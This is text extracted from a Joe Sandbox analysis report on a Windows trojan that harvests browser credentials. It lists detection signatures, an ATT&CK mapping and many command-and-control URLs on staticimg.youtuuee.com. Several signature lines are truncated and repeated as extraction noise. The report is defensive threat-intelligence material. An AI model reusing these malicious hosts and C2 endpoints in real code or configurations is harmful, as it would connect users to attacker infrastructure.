Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3
Transcript of Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3
ID: 508206Sample Name: 7PPXbfDkRNCookbook: default.jbsTime: 09:45:12Date: 24/10/2021Version: 33.0.0 White Diamond
2333333333333444455666666888999
10101010101011121213131313131313141414141414
141414141418242458585858585858
585858
5858
Table of Contents
Table of ContentsWindows Analysis Report 7PPXbfDkRN
OverviewGeneral InformationDetectionSignaturesClassification
Process TreeMalware ConfigurationYara OverviewSigma OverviewJbx Signature Overview
AV Detection:Networking:Stealing of Sensitive Information:
Mitre Att&ck MatrixBehavior GraphScreenshots
ThumbnailsAntivirus, Machine Learning and Genetic Malware Detection
Initial SampleDropped FilesUnpacked PE FilesDomainsURLs
Domains and IPsContacted DomainsContacted URLsURLs from Memory and BinariesContacted IPsPublicPrivate
General InformationSimulations
Behavior and APIsJoe Sandbox View / Context
IPsDomainsASNJA3 FingerprintsDropped Files
Created / dropped FilesStatic File Info
GeneralFile IconStatic PE Info
GeneralEntrypoint PreviewData DirectoriesSectionsResourcesImportsPossible Origin
Network BehaviorNetwork Port DistributionTCP PacketsUDP PacketsDNS QueriesDNS AnswersHTTP Request Dependency GraphHTTP Packets
Code ManipulationsStatisticsSystem Behavior
Analysis Process: 7PPXbfDkRN.exe PID: 5172 Parent PID: 6124GeneralFile Activities
File Read
Registry ActivitiesKey CreatedKey Value Created
DisassemblyCode Analysis
Copyright Joe Security LLC 2021 Page 2 of 58
Windows Analysis Report 7PPXbfDkRN
Overview
General Information
Sample Name:
7PPXbfDkRN (renamed file extension from none to exe)
Analysis ID: 508206
MD5: 1614d9adfb1903a…
SHA1: cfa0028bb78e1b0…
SHA256: 42de2be8dd54f07…
Tags: exe trojan
Infos:
Most interesting Screenshot:
Detection
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for subm
Multi AV Scanner detection for subm
Multi AV Scanner detection for subm
Multi AV Scanner detection for subm
Multi AV Scanner detection for subm
Multi AV Scanner detection for subm
Multi AV Scanner detection for submMulti AV Scanner detection for subm……
Multi AV Scanner detection for doma
Multi AV Scanner detection for doma
Multi AV Scanner detection for doma
Multi AV Scanner detection for doma
Multi AV Scanner detection for doma
Multi AV Scanner detection for doma
Multi AV Scanner detection for domaMulti AV Scanner detection for doma……
Tries to harvest and steal browser in
Tries to harvest and steal browser in
Tries to harvest and steal browser in
Tries to harvest and steal browser in
Tries to harvest and steal browser in
Tries to harvest and steal browser in
Tries to harvest and steal browser inTries to harvest and steal browser in……
May check the online IP address of
May check the online IP address of
May check the online IP address of
May check the online IP address of
May check the online IP address of
May check the online IP address of
May check the online IP address of May check the online IP address of ……
Uses a known web browser user age
Uses a known web browser user age
Uses a known web browser user age
Uses a known web browser user age
Uses a known web browser user age
Uses a known web browser user age
Uses a known web browser user ageUses a known web browser user age……
May sleep (evasive loops) to hinder
May sleep (evasive loops) to hinder
May sleep (evasive loops) to hinder
May sleep (evasive loops) to hinder
May sleep (evasive loops) to hinder
May sleep (evasive loops) to hinder
May sleep (evasive loops) to hinder May sleep (evasive loops) to hinder ……
PE file contains sections with non-s
PE file contains sections with non-s
PE file contains sections with non-s
PE file contains sections with non-s
PE file contains sections with non-s
PE file contains sections with non-s
PE file contains sections with non-sPE file contains sections with non-s……
Internet Provider seen in connection
Internet Provider seen in connection
Internet Provider seen in connection
Internet Provider seen in connection
Internet Provider seen in connection
Internet Provider seen in connection
Internet Provider seen in connectionInternet Provider seen in connection……
Sample execution stops while proce
Sample execution stops while proce
Sample execution stops while proce
Sample execution stops while proce
Sample execution stops while proce
Sample execution stops while proce
Sample execution stops while proceSample execution stops while proce……
IP address seen in connection with o
IP address seen in connection with o
IP address seen in connection with o
IP address seen in connection with o
IP address seen in connection with o
IP address seen in connection with o
IP address seen in connection with oIP address seen in connection with o……
Contains long sleeps (>= 3 min)
Contains long sleeps (>= 3 min)
Contains long sleeps (>= 3 min)
Contains long sleeps (>= 3 min)
Contains long sleeps (>= 3 min)
Contains long sleeps (>= 3 min)
Contains long sleeps (>= 3 min)Contains long sleeps (>= 3 min)
Classification
Malware Configuration
Yara Overview
Sigma Overview
No Sigma rule has matched
Jbx Signature Overview
Click to jump to signature section
AV Detection:
Ransomware
Spreading
Phishing
Banker
Trojan / Bot
Adware
Spyware
Exploiter
Evader
Miner
clean
clean
clean
clean
clean
clean
clean
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
malicious
malicious
malicious
malicious
malicious
malicious
malicious
System is w10x64
7PPXbfDkRN.exe (PID: 5172 cmdline: 'C:\Users\user\Desktop\7PPXbfDkRN.exe' MD5: 1614D9ADFB1903A189E6EFD9B6DC4077)
cleanup
No configs have been found
No yara matches
Process Tree
Copyright Joe Security LLC 2021 Page 3 of 58
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Networking:
May check the online IP address of the machine
Stealing of Sensitive Information:
Tries to harvest and steal browser information (history, passwords, etc)
Mitre Att&ck Matrix
InitialAccess Execution Persistence
PrivilegeEscalation Defense Evasion
CredentialAccess Discovery
LateralMovement Collection Exfiltration
Commandand Control
NetworkEffects
RemoteServiceEffects
ValidAccounts
Commandand ScriptingInterpreter 2
PathInterception
PathInterception
Virtualization/SandboxEvasion 2 1
OSCredentialDumping 1
Security SoftwareDiscovery 1
RemoteServices
Data fromLocalSystem 1
ExfiltrationOver OtherNetworkMedium
Non-ApplicationLayerProtocol 3
Eavesdrop onInsecureNetworkCommunication
RemotelyTrack DeviceWithoutAuthorization
DefaultAccounts
ScheduledTask/Job
Boot orLogonInitializationScripts
Boot orLogonInitializationScripts
Rootkit LSASSMemory
Virtualization/SandboxEvasion 2 1
RemoteDesktopProtocol
Data fromRemovableMedia
ExfiltrationOverBluetooth
ApplicationLayerProtocol 1 3
Exploit SS7 toRedirect PhoneCalls/SMS
RemotelyWipe DataWithoutAuthorization
DomainAccounts
At (Linux) Logon Script(Windows)
LogonScript(Windows)
Obfuscated Files orInformation
SecurityAccountManager
System InformationDiscovery 1
SMB/WindowsAdmin Shares
Data fromNetworkSharedDrive
AutomatedExfiltration
Ingress ToolTransfer 1
Exploit SS7 toTrack DeviceLocation
ObtainDeviceCloudBackups
LocalAccounts
At (Windows) Logon Script(Mac)
LogonScript(Mac)
Binary Padding NTDS Remote SystemDiscovery 1
DistributedComponentObject Model
InputCapture
ScheduledTransfer
ProtocolImpersonation
SIM CardSwap
CloudAccounts
Cron NetworkLogon Script
NetworkLogonScript
Software Packing LSASecrets
System NetworkConfigurationDiscovery 1
SSH Keylogging DataTransferSize Limits
FallbackChannels
ManipulateDeviceCommunication
Behavior Graph
Copyright Joe Security LLC 2021 Page 4 of 58
Behavior GraphID: 508206
Sample: 7PPXbfDkRN
Startdate: 24/10/2021
Architecture: WINDOWS
Score: 64
Multi AV Scanner detectionfor domain / URL
Multi AV Scanner detectionfor submitted file
7PPXbfDkRN.exe
1
started
staticimg.youtuuee.com
45.136.151.102, 49740, 49747, 49751
ENZUINC-US
Latvia
ip-api.com
208.95.112.1, 49735, 80
TUT-ASUS
United States
192.168.2.1
unknown
unknown
May check the onlineIP address of the machine
Tries to harvest andsteal browser information
(history, passwords,etc)
Legend:
Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet
Hide Legend
ThumbnailsThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
Screenshots
Copyright Joe Security LLC 2021 Page 5 of 58
Source Detection Scanner Label Link
7PPXbfDkRN.exe 36% Virustotal Browse
7PPXbfDkRN.exe 37% Metadefender Browse
7PPXbfDkRN.exe 79% ReversingLabs Win64.Trojan.Fabookie
No Antivirus matches
No Antivirus matches
Source Detection Scanner Label Link
staticimg.youtuuee.com 10% Virustotal Browse
Source Detection Scanner Label Link
staticimg.youtuuee.com/api/?sid=2152857&key=da7c50094c591bee303e6ae40134d365 0% Avira URL Cloud safe
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
Dropped Files
Unpacked PE Files
Domains
URLs
Copyright Joe Security LLC 2021 Page 6 of 58
staticimg.youtuuee.com/api/?sid=2150673&key=240dac36d4da93b289eb9fc9b1dbf3cf 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2153401&key=9ed37d9c1beee98f6d8f22f1a64c1654 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2154697&key=640de8d1cb30960e150a2ae83ccdeee3 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/fbtimemTK0gS 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2152489&key=46f757656210dc4b97f0993898e9f65a 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151471&key=e2e363a560e1822402bad2f0fc58fa96 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2152217&key=f2c0898237d9ba1952d46480d49a59f7 0% Avira URL Cloud safe
staticimg.youtuuee.com//uuG 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149673&key=2f27b215dee998f785c084fa1eb07300ar2t8dvJ 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149915&key=b11dbd658e1f32589d31d99042dd3389 0% Avira URL Cloud safe
staticimg.youtuuee.com/3g 0% Avira URL Cloud safe
staticimg.youtuuee.com/6 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2154731&key=8848854bc680c4541c9c575e1a4771dd 0% Avira URL Cloud safe
staticimg.youtuuee.com/9 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149615&key=2891fe78238bcde026f8e178fbf9a3c7EiKx8jqb 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150263&key=7ead2109b3f290feba66dfab4687cfc7 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150837&key=d83b5cee705da3d2c3bd196ed9680364 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2154533&key=c7fb4ab16edcd802aad73ad31c7a6053 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2155181&key=fa977c193b47e7332ed4283fbaf11d76 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149311&key=51597f4ebba3856d49b8f376ed79ffcd 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149425&key= 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150939&key=ed9790a22aadd1de955b18ce8e9931a9 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2152407&key=0cdc4727b29ccc42a342731a90513a0a 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2155033&key=09d24ce185902446082e2e3ee9d7bd82 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2154027&key=903c4563e00cc833ed3ef11833208a6c 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149847&key=816477b8c4004734b59828b80296cf07 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2153485&key=d713bae4f654cdc874d728df40de994d 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2155417&key=140fb8c1fe3a3339fbd5b964512b26dd 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2152915&key=fab7042d902b81d3499e2f4812a82abb 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151395&key=908b7d52946ed1fe1b4d90f6042b182f 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2153821&key=51f95ef46d0bfa46b8bd60b850c9ef78 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2154771&key=39e47a01daa083a1bd270f910ef0c9eb 0% Avira URL Cloud safe
https://fs.microsoft.ctaticimg.youtuuee.com/ 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2155141&key=fd9f29291b5effe4cbd7ba5ef31627f6 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151781&key=2347a6563ff4775fdef52ecb52801f89 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150019&key=6c4543fee94c34490cafe241dae1f023 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2152791&key=8ab1ecd282ed1eec8035cb128b32dcbc 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2154447&key=74749e2b6b426fd444378aa2fe85023e 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2154923&key=9c5411d2083705cefd42a032d0af03c8 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2152259&key=e090c5963155784f601aef37e72b8873 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2154577&key=a6f9c82a9ee2fd0716c7716cef678bae 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151913&key=ca8ab25ac24d85f5f40e19c69d4c0dfb 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150867&key=063d31afe0e24621c7d74dbaf75408d0 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149773&key=a33cb0101d3e27c4b8d501900e5403c9 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151515&key=9fd25806a58ec606eef9d15c62732749 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2153857&key=2ec8639a3f63f83a5b785e6b27289827 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2152065&key=6e090913b5ff6772b6ebfb09eec40122 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151661&key=767058d62f3520060a4251b422d4f0f8 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2153625&key=b4deabba4c5567e2603bf9b7d8f17999 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151095&key=7c9887cd3cb16aeb568a33c9ccd8c538 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2153999&key=b11b5edba1e160c5872142eebf4cfbe8 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150263&key=7ead2109b3f290feba66dfab4687cfc7indexOcuq 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151889&key=9e57839762ecfd044ae54467558e2d13 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2154653&key=5b951c7a4795ce5831e26305741392a3 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2155331&key=2a33ceba8682c9df2dc341f9116a5d27 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149673&key=2f27b215dee998f785c084fa1eb073000xi1KYLi 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150479&key=d26e2d32e64af0304786124de837af72_1 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151737&key=07322b52521c878f34088a3488e7da0f 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2155219&key=36de31bf0ba525db67e8f20ac8f7fbbd 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150597&key= 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151681&key=c0f5fc90e1facbe18dc9329914865053 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2154341&key=fa9c36a867d6c3269aa994d674f7a30e 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151823&key=5d19a03d12572a7a7c0dc25bffa6153c 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2153961&key=59601c765eacbdd03ac8b15bf80559c8 0% Avira URL Cloud safe
Source Detection Scanner Label Link
Copyright Joe Security LLC 2021 Page 7 of 58
staticimg.youtuuee.com/api/?sid=2153277&key=0480e5d02c2e53a64a3a2004650f080f 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150093&key=6e5de35b796142fbcf8f6d325b0400186 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2152759&key=777c898c3c029604650c15ae6fd7c451 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149215&key=bd3cb4debade8ca1e0a19fe2ed18b376v 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/fbtime5Hw0y/ 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2153183&key=471088d8ebbf6311129660d9a5495f81 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150543&key=dc8b6a39192685a24adf63edb72eaa2f: 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150479&key=d26e2d32e64af0304786124de837af72~ 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/fbtime0u0uS& 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2152699&key=e8f15d7590fcf56448c8afde3920b962 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150371&key=814316fb83cc23ea4f6bee56f3d3e033 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151265&key=03d3bf4050b9f515c87ca732bd77f2cf 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151983&key=8933f8157c9ae9d3a58a888149c944c9 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151705&key=beddfc0f604b817684e375cfb227d46e 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=21503 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2152097&key=40940a04fb97562c1b7b50b22dc712b8 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150479&key=d26e2d32e64af0304786124de837af72r 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149673&key=2f27b215dee998f785c084fa1eb07300wnAsZ/rG 0% Avira URL Cloud safe
staticimg.youtuuee.com/e 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2151177&key=a71f58dbe888f846ae5846e444e1e656 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149915&key=b11dbd658e1f32589d31d99042dd3389W1S79c7Mj
0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2153055&key=0999538dd8bd04a8657fda92ed9b60bf 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149425&key=2975b649e6fdf9d69b74a57abb0bc8dd2020 0% Avira URL Cloud safe
staticimg.youtuuee.com/n 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150431&key=8566e456c914f2b7c1956cb023b47cdb 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150329&key=e265996d76c1500e0649f58ac61c7690 0% Avira URL Cloud safe
staticimg.youtuuee.com/r 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2153767&key=1e49078a3c3e77f99bedd39b8f4a4a7d 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149425&key=2975b649e6fdf9d69b74a57abb0bc8ddsg 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150597&key=f556d9b1b3eb13930c8eb84fd2c75d69t9uY4I3zy 0% Avira URL Cloud safe
staticimg.youtuuee.com/D 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2149343&key=522b94416aa18897bef2f92ed75a7b55kg 0% Avira URL Cloud safe
staticimg.youtuuee.com/api/?sid=2150735&key=141effec60248e2d310c38549aec1135 0% Avira URL Cloud safe
Source Detection Scanner Label Link
Name IP Active Malicious Antivirus Detection Reputation
ip-api.com 208.95.112.1 true false high
staticimg.youtuuee.com 45.136.151.102 true true 10%, Virustotal, Browse unknown
Name Malicious Antivirus Detection Reputation
staticimg.youtuuee.com/api/?sid=2152857&key=da7c50094c591bee303e6ae40134d365 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2150673&key=240dac36d4da93b289eb9fc9b1dbf3cf true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2153401&key=9ed37d9c1beee98f6d8f22f1a64c1654 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2154697&key=640de8d1cb30960e150a2ae83ccdeee3 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2152489&key=46f757656210dc4b97f0993898e9f65a true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151471&key=e2e363a560e1822402bad2f0fc58fa96 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2152217&key=f2c0898237d9ba1952d46480d49a59f7 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2149915&key=b11dbd658e1f32589d31d99042dd3389 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2154731&key=8848854bc680c4541c9c575e1a4771dd true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2150263&key=7ead2109b3f290feba66dfab4687cfc7 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2150837&key=d83b5cee705da3d2c3bd196ed9680364 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2154533&key=c7fb4ab16edcd802aad73ad31c7a6053 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2155181&key=fa977c193b47e7332ed4283fbaf11d76 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2149311&key=51597f4ebba3856d49b8f376ed79ffcd true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2150939&key=ed9790a22aadd1de955b18ce8e9931a9 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2152407&key=0cdc4727b29ccc42a342731a90513a0a true Avira URL Cloud: safe unknown
Domains and IPs
Contacted Domains
Contacted URLs
Copyright Joe Security LLC 2021 Page 8 of 58
staticimg.youtuuee.com/api/?sid=2155033&key=09d24ce185902446082e2e3ee9d7bd82 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2154027&key=903c4563e00cc833ed3ef11833208a6c true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2149847&key=816477b8c4004734b59828b80296cf07 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2153485&key=d713bae4f654cdc874d728df40de994d true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2155417&key=140fb8c1fe3a3339fbd5b964512b26dd true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2152915&key=fab7042d902b81d3499e2f4812a82abb true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151395&key=908b7d52946ed1fe1b4d90f6042b182f true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2153821&key=51f95ef46d0bfa46b8bd60b850c9ef78 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2154771&key=39e47a01daa083a1bd270f910ef0c9eb true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2155141&key=fd9f29291b5effe4cbd7ba5ef31627f6 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151781&key=2347a6563ff4775fdef52ecb52801f89 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2150019&key=6c4543fee94c34490cafe241dae1f023 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2152791&key=8ab1ecd282ed1eec8035cb128b32dcbc true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2154447&key=74749e2b6b426fd444378aa2fe85023e true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2154923&key=9c5411d2083705cefd42a032d0af03c8 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2152259&key=e090c5963155784f601aef37e72b8873 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2154577&key=a6f9c82a9ee2fd0716c7716cef678bae true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151913&key=ca8ab25ac24d85f5f40e19c69d4c0dfb true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2150867&key=063d31afe0e24621c7d74dbaf75408d0 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2149773&key=a33cb0101d3e27c4b8d501900e5403c9 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151515&key=9fd25806a58ec606eef9d15c62732749 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2153857&key=2ec8639a3f63f83a5b785e6b27289827 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2152065&key=6e090913b5ff6772b6ebfb09eec40122 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151661&key=767058d62f3520060a4251b422d4f0f8 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2153625&key=b4deabba4c5567e2603bf9b7d8f17999 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151095&key=7c9887cd3cb16aeb568a33c9ccd8c538 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2153999&key=b11b5edba1e160c5872142eebf4cfbe8 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151889&key=9e57839762ecfd044ae54467558e2d13 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2154653&key=5b951c7a4795ce5831e26305741392a3 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2155331&key=2a33ceba8682c9df2dc341f9116a5d27 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151737&key=07322b52521c878f34088a3488e7da0f true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2155219&key=36de31bf0ba525db67e8f20ac8f7fbbd true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151681&key=c0f5fc90e1facbe18dc9329914865053 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2154341&key=fa9c36a867d6c3269aa994d674f7a30e true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151823&key=5d19a03d12572a7a7c0dc25bffa6153c true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2153961&key=59601c765eacbdd03ac8b15bf80559c8 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2153277&key=0480e5d02c2e53a64a3a2004650f080f true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2152759&key=777c898c3c029604650c15ae6fd7c451 true Avira URL Cloud: safe unknown
ip-api.com/json/ false high
staticimg.youtuuee.com/api/?sid=2153183&key=471088d8ebbf6311129660d9a5495f81 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2152699&key=e8f15d7590fcf56448c8afde3920b962 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2150371&key=814316fb83cc23ea4f6bee56f3d3e033 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151265&key=03d3bf4050b9f515c87ca732bd77f2cf true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151983&key=8933f8157c9ae9d3a58a888149c944c9 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151705&key=beddfc0f604b817684e375cfb227d46e true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2152097&key=40940a04fb97562c1b7b50b22dc712b8 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2151177&key=a71f58dbe888f846ae5846e444e1e656 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2153055&key=0999538dd8bd04a8657fda92ed9b60bf true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2150431&key=8566e456c914f2b7c1956cb023b47cdb true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2150329&key=e265996d76c1500e0649f58ac61c7690 true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2153767&key=1e49078a3c3e77f99bedd39b8f4a4a7d true Avira URL Cloud: safe unknown
staticimg.youtuuee.com/api/?sid=2150735&key=141effec60248e2d310c38549aec1135 true Avira URL Cloud: safe unknown
Name Malicious Antivirus Detection Reputation
IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1 ip-api.com United States 53334 TUT-ASUS false
45.136.151.102 staticimg.youtuuee.com Latvia 18978 ENZUINC-US true
URLs from Memory and Binaries
Contacted IPs
Public
Copyright Joe Security LLC 2021 Page 9 of 58
General Information
Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 508206
Start date: 24.10.2021
Start time: 09:45:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 56s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 7PPXbfDkRN (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:
23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabledEGA enabledHDC enabledAMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal64.troj.spyw.winEXE@1/0@146/3
EGA Information: Failed
HDC Information: Failed
HCA Information: Failed
Cookbook Comments: Adjust boot timeEnable AMSI
Warnings:
IP
192.168.2.1
Time Type Description
09:46:11 API Interceptor 403x Sleep call for process: 7PPXbfDkRN.exe modified
Match Associated Sample Name / URL SHA 256 Detection Link Context
208.95.112.1 13294_Video_Oynat#U0131c#U0131.apk Get hash malicious Browse ip-api.com/json
Comprobante de pago.xls Get hash malicious Browse ip-api.com/json/
Private
